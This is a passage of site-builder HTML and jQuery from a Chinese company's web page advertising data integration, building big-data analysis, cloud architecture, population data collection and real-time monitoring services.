$(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_111_32" ctype="line" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_109_46" tareaid="" re-direction="x" daxis="All" isdeletable="True" style="height: 20px; width: 292px; left: 29px; top: 109px;z-index:3;"><div class="yibuFrameContent con_111_32 line_Style1 " style="overflow:visible;;"><!-- w-line --> <div style="position:relative; height:100%"> <div class="w-line" style="position:absolute;top:50%;" linetype="horizontal"></div> </div> </div></div><div id="smv_con_112_49" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item4" areaid="Area0" iscontainer="False" pvid="con_109_46" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 112px; width: 292px; left: 29px; top: 147px;z-index:4;"><div class="yibuFrameContent con_112_49 text_Style1 " style="overflow:hidden;;"><div id='txt_con_112_49' style="height: 100%;"> <div class="editableContent" id="txtc_con_112_49" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#ffffff"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">尽管深度学习已经在人工智能领域做出重大贡献,但这项技术本身仍存在一项致命缺陷:需要大量数据的加持……</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_112_49').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_113_46" ctype="button" class="esmartMargin smartAbs " cpid="30536" cstyle="Style9" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_109_46" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 38px; width: 38px; left: 305px; top: 290px;z-index:5;"><div class="yibuFrameContent con_113_46 button_Style9 " style="overflow:visible;;"><!-- 类 --> <!-- w-button-isi + (w-isi-top w-isi-bottom w-isi-left w-isi-right) --> <!-- w-button-wayra + (w-wayra-topLeft w-wayra-topRight w-wayra-bottomLeft w-wayra-bottomRight) --> <a target="_self" href="#" class="w-button w-isi-left w-button-isi f-ellipsis hover-effect" data-effect-name="sweep-to-right" style="width: 38px; height: 38px; line-height: 38px;"> <span class="w-button-position"> <span class="w-button-position-inner"> <em class="w-button-text f-ellipsis"> <i class="mw-iconfont w-button-icon ">뀠</i> </em> </span> </span> </a> <script type="text/javascript"> $(function () { }); </script> </div></div> </div> </div></div></div></div> <div id="bannerWrap_con_104_50" class="fullcolumn-outer" style="position: absolute; top: 0; bottom: 0;"> </div> <script type="text/javascript"> $(function () { var resize = function () { $("#smv_con_104_50 >.yibuFrameContent>.fullcolumn-inner").width($("#smv_con_104_50").parent().width()); $('#bannerWrap_con_104_50').fullScreen(function (t) { if (VisitFromMobile()) { t.css("min-width", t.parent().width()) } }); } if (typeof (LayoutConverter) !== "undefined") { LayoutConverter.CtrlJsVariableList.push({ CtrlId: "con_104_50", ResizeFunc: resize, }); } else { $(window).resize(function (e) { if (e.target == this) { resize(); } }); } resize(); }); </script> </div></div><div id="smv_con_170_31" ctype="banner" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="" iscontainer="True" pvid="" tareaid="" re-direction="y" daxis="Y" isdeletable="True" style="height: 370px; width: 100%; left: 0px; top: 2628px;z-index:0;"><div class="yibuFrameContent con_170_31 banner_Style1 " style="overflow:visible;;"><div class="fullcolumn-inner smAreaC" id="smc_Area0" cid="con_170_31" style="width:1200px"> <div id="smv_con_134_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_170_31" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 344px; width: 1200px; left: 0px; top: 15px;z-index:10;"><div class="yibuFrameContent con_134_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_134_22"> <div id="smv_con_207_24" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_134_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 344px; width: 380px; left: 0px; top: 0px;z-index:10;"><div class="yibuFrameContent con_207_24 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_207_24"> <div id="smv_con_135_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Left","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_207_24" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 148px; width: 380px; left: 0px; top: 0px;z-index:7;"><div class="yibuFrameContent con_135_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_135_22"> <div id="smv_con_212_9" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_135_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 101px; width: 73px; left: 1px; top: 18px;z-index:7;"><div class="yibuFrameContent con_212_9 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_212_9"> <div id="smv_con_213_9" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_212_9" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 50px; width: 50px; left: 11px; top: 27px;z-index:2;"><div class="yibuFrameContent con_213_9 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_213_9"> <a target="_self" href=""> <img src="static/picture/-48630.png" alt="" title="" id="img_smv_con_213_9" style="width: 48px; height:48px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_213_9", "48", "50", "0"); }); </script> </div></div> </div> </div></div></div><div id="smv_con_216_6" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_135_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 92px; width: 261px; left: 98px; top: 24px;z-index:11;"><div class="yibuFrameContent con_216_6 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_216_6"> <div id="smv_con_214_9" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="con_216_6" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 40px; width: 198px; left: 0px; top: 0px;z-index:8;"><div class="yibuFrameContent con_214_9 text_Style1 " style="overflow:hidden;;"><div id='txt_con_214_9' style="height: 100%;"> <div class="editableContent" id="txtc_con_214_9" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="font-size:20px"><span style="color:#856dcc"><span style="font-family:Source Han Sans,Geneva,sans-serif">一站式数据集成</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_214_9').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_215_9" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_216_6" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 52px; width: 261px; left: 0px; top: 40px;z-index:9;"><div class="yibuFrameContent con_215_9 text_Style1 " style="overflow:hidden;;"><div id='txt_con_215_9' style="height: 100%;"> <div class="editableContent" id="txtc_con_215_9" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#888888"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">以舒适高效、节能低耗、安全智能的全案服务,让管理有序化、集约化、高效化。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_215_9').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> </div> </div></div></div><div id="smv_con_150_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Left","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_207_24" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 148px; width: 380px; left: 0px; top: 196px;z-index:7;"><div class="yibuFrameContent con_150_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_150_22"> <div id="smv_con_151_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_150_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 101px; width: 73px; left: 0px; top: 16px;z-index:7;"><div class="yibuFrameContent con_151_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_151_22"> <div id="smv_con_152_22" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_151_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 53px; width: 53px; left: 10px; top: 25px;z-index:2;"><div class="yibuFrameContent con_152_22 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_152_22"> <a target="_self" href=""> <img src="static/picture/-48683.png" alt="" title="" id="img_smv_con_152_22" style="width: 51px; height:51px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_152_22", "51", "53", "0"); }); </script> </div></div> </div> </div></div></div><div id="smv_con_221_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_150_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 111px; width: 261px; left: 97px; top: 22px;z-index:10;"><div class="yibuFrameContent con_221_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_221_22"> <div id="smv_con_153_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="con_221_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 40px; width: 198px; left: 0px; top: 0px;z-index:8;"><div class="yibuFrameContent con_153_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_153_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_153_22" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="font-size:20px"><span style="color:#856dcc"><span style="font-family:Source Han Sans,Geneva,sans-serif">专业建筑大数据分析</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_153_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_154_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_221_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 71px; width: 261px; left: 0px; top: 40px;z-index:9;"><div class="yibuFrameContent con_154_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_154_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_154_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#888888"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">以舒适高效、节能低耗、安全智能的全案服务,让管理有序化、集约化、高效化。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_154_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> </div> </div></div></div> </div> </div></div></div><div id="smv_con_208_29" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_134_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 344px; width: 380px; left: 405px; top: 0px;z-index:11;"><div class="yibuFrameContent con_208_29 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_208_29"> <div id="smv_con_140_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Down","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_208_29" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 148px; width: 380px; left: 0px; top: 0px;z-index:7;"><div class="yibuFrameContent con_140_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_140_22"> <div id="smv_con_141_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_140_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 101px; width: 73px; left: 1px; top: 16px;z-index:7;"><div class="yibuFrameContent con_141_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_141_22"> <div id="smv_con_142_22" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_141_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 53px; width: 53px; left: 10px; top: 25px;z-index:2;"><div class="yibuFrameContent con_142_22 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_142_22"> <a target="_self" href=""> <img src="static/picture/-48681.png" alt="" title="" id="img_smv_con_142_22" style="width: 51px; height:51px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_142_22", "51", "53", "0"); }); </script> </div></div> </div> </div></div></div><div id="smv_con_217_11" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_140_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 111px; width: 261px; left: 98px; top: 22px;z-index:10;"><div class="yibuFrameContent con_217_11 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_217_11"> <div id="smv_con_143_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="con_217_11" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 40px; width: 198px; left: 0px; top: 0px;z-index:8;"><div class="yibuFrameContent con_143_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_143_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_143_22" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="font-size:20px"><span style="color:#856dcc"><span style="font-family:Source Han Sans,Geneva,sans-serif">分布式云端架构</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_143_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_144_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_217_11" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 71px; width: 261px; left: 0px; top: 40px;z-index:9;"><div class="yibuFrameContent con_144_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_144_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_144_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#888888"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">以舒适高效、节能低耗、安全智能的全案服务,让管理有序化、集约化、高效化。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_144_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> </div> </div></div></div><div id="smv_con_155_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Up","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_208_29" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 148px; width: 380px; left: 0px; top: 196px;z-index:7;"><div class="yibuFrameContent con_155_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_155_22"> <div id="smv_con_156_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_155_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 101px; width: 73px; left: 0px; top: 16px;z-index:7;"><div class="yibuFrameContent con_156_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_156_22"> <div id="smv_con_157_22" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_156_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 53px; width: 53px; left: 10px; top: 25px;z-index:2;"><div class="yibuFrameContent con_157_22 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_157_22"> <a target="_self" href=""> <img src="static/picture/-48691.png" alt="" title="" id="img_smv_con_157_22" style="width: 51px; height:51px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_157_22", "51", "53", "0"); }); </script> </div></div> </div> </div></div></div><div id="smv_con_220_19" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_155_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 111px; width: 261px; left: 97px; top: 22px;z-index:10;"><div class="yibuFrameContent con_220_19 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_220_19"> <div id="smv_con_158_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="con_220_19" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 40px; width: 198px; left: 0px; top: 0px;z-index:8;"><div class="yibuFrameContent con_158_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_158_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_158_22" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="font-size:20px"><span style="color:#856dcc"><span style="font-family:Source Han Sans,Geneva,sans-serif">人口信息采集存储</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_158_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_159_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_220_19" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 71px; width: 261px; left: 0px; top: 40px;z-index:9;"><div class="yibuFrameContent con_159_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_159_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_159_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#888888"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">以舒适高效、节能低耗、安全智能的全案服务,让管理有序化、集约化、高效化。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_159_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> </div> </div></div></div> </div> </div></div></div><div id="smv_con_209_37" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_134_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 344px; width: 380px; left: 818px; top: 0px;z-index:12;"><div class="yibuFrameContent con_209_37 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_209_37"> <div id="smv_con_145_22" ctype="area" smanim='{"delay":0.75,"duration":0.75,"direction":"Right","animationName":"slideIn","infinite":"1"}' class="esmartMargin smartAbs animated" cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_209_37" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 148px; width: 380px; left: 0px; top: 0px;z-index:7;"><div class="yibuFrameContent con_145_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_145_22"> <div id="smv_con_146_22" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_145_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 101px; width: 73px; left: 0px; top: 16px;z-index:7;"><div class="yibuFrameContent con_146_22 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_146_22"> <div id="smv_con_147_22" ctype="image" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="con_146_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 53px; width: 53px; left: 10px; top: 25px;z-index:2;"><div class="yibuFrameContent con_147_22 image_Style1 " style="overflow:visible;;"> <div class="w-image-box image-clip-wrap" data-filltype="0" id="div_con_147_22"> <a target="_self" href=""> <img src="static/picture/-48682.png" alt="" title="" id="img_smv_con_147_22" style="width: 51px; height:51px;" class=""> </a> </div> <script type="text/javascript"> $(function () { InitImageSmv("con_147_22", "51", "53", "0"); }); </script> </div></div> </div> </div></div></div><div id="smv_con_218_14" ctype="area" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item0" areaid="Area0" iscontainer="True" pvid="con_145_22" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 111px; width: 261px; left: 97px; top: 22px;z-index:10;"><div class="yibuFrameContent con_218_14 area_Style1 " style="overflow:visible;;"><div class="w-container" data-effect-name="enterTop"> <div class="smAreaC" id="smc_Area0" cid="con_218_14"> <div id="smv_con_148_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="con_218_14" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 40px; width: 198px; left: 0px; top: 0px;z-index:8;"><div class="yibuFrameContent con_148_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_148_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_148_22" style="height: 100%; word-wrap:break-word;"> <p><strong><span style="font-size:20px"><span style="color:#856dcc"><span style="font-family:Source Han Sans,Geneva,sans-serif">实时监控与反向控制</span></span></span></strong></p> </div> </div> <script> var tables = $(' #smv_con_148_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div><div id="smv_con_149_22" ctype="text" class="esmartMargin smartAbs " cpid="30536" cstyle="Style1" ccolor="Item5" areaid="Area0" iscontainer="False" pvid="con_218_14" tareaid="" re-direction="all" daxis="All" isdeletable="True" style="height: 71px; width: 261px; left: 0px; top: 40px;z-index:9;"><div class="yibuFrameContent con_149_22 text_Style1 " style="overflow:hidden;;"><div id='txt_con_149_22' style="height: 100%;"> <div class="editableContent" id="txtc_con_149_22" style="height: 100%; word-wrap:break-word;"> <p style="text-align:justify"><span style="font-size:14px"><span style="color:#888888"><span style="line-height:1.75"><span style="font-family:Source Han Sans,Geneva,sans-serif">以舒适高效、节能低耗、安全智能的全案服务,让管理有序化、集约化、高效化。</span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_con_149_22').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div> </div> </div></div></div> 